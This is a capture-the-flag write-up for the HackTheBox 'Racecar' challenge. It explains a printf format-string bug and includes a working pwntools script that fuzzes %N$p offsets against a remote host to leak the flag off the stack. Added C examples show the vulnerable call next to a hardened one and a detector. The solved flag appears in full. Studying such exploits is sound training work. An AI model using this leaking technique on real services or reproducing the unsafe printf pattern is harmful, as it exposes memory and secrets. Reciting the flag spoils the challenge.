# Racecar

{% file src="/files/obqeUoJAvaWHSQiUncxK" %}

```
CHALLENGE DESCRIPTION
Did you know that racecar spelled backwards is racecar? Well, now that you know everything about racing, win this race and get the flag!
```

This binary has a format string vulnerability: the text we type at the "press" prompt is used as the `printf` format. Since the flag is stored in a local variable on the stack, we can use the vulnerability to leak it, stack word by stack word.
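The bug class in a few lines. This is an added C example, not the challenge binary's source (which is not on the page): the vulnerable call sits beside the hardened one, followed by a small check a reviewer or a logging layer can run to spot input that would be interpreted as a format string. The function names are my own; the unsafe function is compiled for contrast only and is never invoked.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* VULNERABLE: the player's statement is the format string itself. Every
 * '%' in it is interpreted, so "%p %p %p" walks the caller's stack slots
 * and any local variable, the flag included, can be printed.
 * Kept only for contrast; nothing below calls it. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
static void press_statement_unsafe(const char *statement) {
    printf(statement);
}
#pragma GCC diagnostic pop

/* HARDENED: the format is a compile-time constant and the statement is
 * passed as data, so '%' sequences in it are printed literally.
 * Returns snprintf's result (the length of the statement). */
int press_statement_safe(char *out, size_t outsz, const char *statement) {
    return snprintf(out, outsz, "%s", statement);
}

/* Detection helper (my own, not from the challenge): true if the string
 * contains a conversion directive, i.e. a '%' that is not the escaped
 * literal "%%". Handy for flagging input that reached a format argument. */
bool has_format_directive(const char *s) {
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%" prints a single '%', harmless */
            p++;
            continue;
        }
        return true;         /* "%p", "%12$p", "%s", a trailing lone '%' ... */
    }
    return false;
}

int main(void) {
    /* Constructed input, mirroring what the write-up types at the prompt */
    const char *press = "%p %p %p %p %p %p %p %p";
    char out[64];

    press_statement_safe(out, sizeof out, press);
    printf("safe:   %s\n", out);   /* the %p's come out as literal text */
    printf("directive present: %s\n", has_format_directive(press) ? "yes" : "no");
    (void)press_statement_unsafe;  /* deliberately not invoked */
    return 0;
}
```

Building real code with `gcc -Wformat -Wformat-security` reports the unsafe call as "format not a string literal and no format arguments"; the pragma above exists only so the contrast compiles quietly in one file, and would have no place in production code.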

<div align="left"><figure><img src="/files/vAp2N0NtZydTToq0BxS0" alt=""><figcaption></figcaption></figure></div>

```bash
┌──(root㉿kali)-[/home/kali/hackthebox/pwn]
└─# ./racecar

🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌
      ______                                       |xxx|
     /|_||_\`.__                                   | F |
    (   _    _ _\                                  |xxx|
*** =`-(_)--(_)-'                                  | I |
                                                   |xxx|
                                                   | N |
                                                   |xxx|
                                                   | I |
                                                   |xxx|
             _-_-  _/\______\__                    | S |
           _-_-__ / ,-. -|-  ,-.`-.                |xxx|
            _-_- `( o )----( o )-'                 | H |
                   `-'      `-'                    |xxx|
🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌🎌

Insert your data:

Name: name
Nickname: something

[+] Welcome [name]!

[*] Your name is [name] but everybody calls you.. [something]!
[*] Current coins: [69]

1. Car info
2. Car selection
> 2


Select car:
1. 🚗
2. 🏎
> 2


Select race:
1. Highway battle
2. Circuit
> 1

[*] Waiting for the race to finish...

[+] You won the race!! You get 100 coins!
[+] Current coins: [169]

[!] Do you have anything to say to the press after your big victory?
> %p %p %p %p %p %p %p %p

The Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: 
0x583ec200 0x170 0x565bfdfa 0x42 (nil) 0x26 0x2 0x1
```

We don't know at which stack offset the variable holding the flag sits, so we fuzz the offsets with `%N$p` and keep leaking until the flag appears. The Python script below automates this.

### <mark style="color:blue;">Exploit:</mark>

```python
from pwn import *

HOST, PORT = '83.136.253.251', 42831

flag = ''

# Try stack offsets 1..99 with %<i>$p and keep the words that decode as text
for i in range(1, 100):
    io = None
    try:
        # Connect and play through the menu to reach the "press" prompt
        io = remote(HOST, PORT)
        io.sendlineafter(b'Name: ', b'anas')
        io.sendlineafter(b'Nickname: ', b'something')
        io.sendlineafter(b'> ', b'2')   # Car selection
        io.sendlineafter(b'> ', b'2')   # Second car
        io.sendlineafter(b'> ', b'1')   # Highway battle
        # %i$p prints the i-th argument slot on the stack as a pointer
        io.sendlineafter(b'> ', '%{}$p'.format(i).encode())
        # Skip the two lines printed before the echoed statement
        io.recvline()
        io.recvline()
        result = io.recv()
        if b'nil' not in result:
            print(str(i) + ': ' + str(result))
            try:
                # Each 32-bit stack word holds four flag bytes; %p prints the
                # word big-endian, so unhex it and reverse the bytes to get
                # them back in string order
                decoded = unhex(result.strip().decode()[2:])
                reversed_hex = decoded[::-1]
                print(str(reversed_hex))
                # Build up the flag
                flag += reversed_hex.decode()
            except ValueError:
                # Bad hex or non-printable bytes: this word is not flag text
                pass
    except EOFError:
        pass
    finally:
        # Close every connection, not just the last one
        if io is not None:
            io.close()

info(flag)
```

Let's run the fuzzer:

```bash
┌──(kali㉿kali)-[~/hackthebox/pwn]
└─$ python exploit.py

...
[+] Opening connection to 83.136.253.251 on port 42831: Done
12: b'0x7b425448\n'
b'HTB{'
[+] Opening connection to 83.136.253.251 on port 42831: Done
13: b'0x5f796877\n'
b'why_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
14: b'0x5f643164\n'
b'd1d_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
15: b'0x34735f31\n'
b'1_s4'
[+] Opening connection to 83.136.253.251 on port 42831: Done
16: b'0x745f3376\n'
b'v3_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
17: b'0x665f3368\n'
b'h3_f'
[+] Opening connection to 83.136.253.251 on port 42831: Done
18: b'0x5f67346c\n'
b'l4g_'
[+] Opening connection to 83.136.253.251 on port 42831: Done
19: b'0x745f6e30\n'
b'0n_t'
[+] Opening connection to 83.136.253.251 on port 42831: Done
20: b'0x355f3368\n'
b'h3_5'
[+] Opening connection to 83.136.253.251 on port 42831: Done
21: b'0x6b633474\n'
b't4ck'
[+] Opening connection to 83.136.253.251 on port 42831: Done
22: b'0x7d213f\n'
b'?!}'
...
[*] HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}

```
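The decoding step, worked offline in C so the byte order is explicit. This is an added example, not code from the write-up: `parse_leaked_words` turns a line of `%p` output into 32-bit words (treating `(nil)` as 0), and `words_to_string` re-serialises them little-endian and stops at the first NUL. The sample input is the write-up's own leaks for offsets 12..22, joined into one space-separated line (constructed here), and the eight-value line from the first transcript is used to show the `(nil)` case; both function names are my own.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed: the write-up's per-offset leaks (12..22) joined into one line,
 * the way a single "%p %p ..." request prints several words at once. */
static const char *const LEAKED_FLAG_WORDS =
    "0x7b425448 0x5f796877 0x5f643164 0x34735f31 0x745f3376 0x665f3368 "
    "0x5f67346c 0x745f6e30 0x355f3368 0x6b633474 0x7d213f";

/* Parse one line of %p output ("0x7b425448 (nil) 0x170 ...") into 32-bit
 * words. "(nil)" is how glibc prints a NULL pointer and becomes 0.
 * Parsing stops at the first token that is neither; returns the count. */
size_t parse_leaked_words(const char *line, uint32_t *words, size_t max_words) {
    size_t n = 0;
    const char *p = line;
    while (*p != '\0' && n < max_words) {
        while (isspace((unsigned char)*p))
            p++;
        if (*p == '\0')
            break;
        if (strncmp(p, "(nil)", 5) == 0) {
            words[n++] = 0;
            p += 5;
        } else if (p[0] == '0' && (p[1] == 'x' || p[1] == 'X')) {
            char *end;
            unsigned long v = strtoul(p, &end, 16);
            if (end == p)
                break;
            words[n++] = (uint32_t)v;
            p = end;
        } else {
            break;  /* not a %p token */
        }
    }
    return n;
}

/* The binary is 32-bit little-endian: a stack word holding "HTB{" is read
 * as 0x7b425448, i.e. the first character sits in the low-order byte. Emit
 * each word's bytes low-to-high and stop at the first NUL, which is why the
 * final word 0x7d213f is only three bytes wide. Returns the string length. */
size_t words_to_string(const uint32_t *words, size_t n, char *out, size_t outsz) {
    size_t len = 0;
    for (size_t i = 0; i < n && len + 1 < outsz; i++) {
        for (int b = 0; b < 4 && len + 1 < outsz; b++) {
            char c = (char)((words[i] >> (8 * b)) & 0xff);
            if (c == '\0') {
                out[len] = '\0';
                return len;
            }
            out[len++] = c;
        }
    }
    out[len] = '\0';
    return len;
}

int main(void) {
    uint32_t words[16];
    char flag[64];
    size_t n = parse_leaked_words(LEAKED_FLAG_WORDS, words, 16);
    words_to_string(words, n, flag, sizeof flag);
    printf("%zu words -> %s\n", n, flag);
    return 0;
}
```

Parsing the words first and decoding second is what makes the `(nil)` slot in the first transcript harmless: it becomes a zero word and, if it ever landed inside the flag region, would simply terminate the string instead of crashing the decoder.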

### <mark style="color:blue;">Flag:</mark>

```
HTB{why_d1d_1_s4v3_th3_fl4g_0n_th3_5t4ck?!}
```

<div align="left"><figure><img src="/files/olpCk4cOLh1PaJb5GYEQ" alt=""><figcaption></figcaption></figure></div>
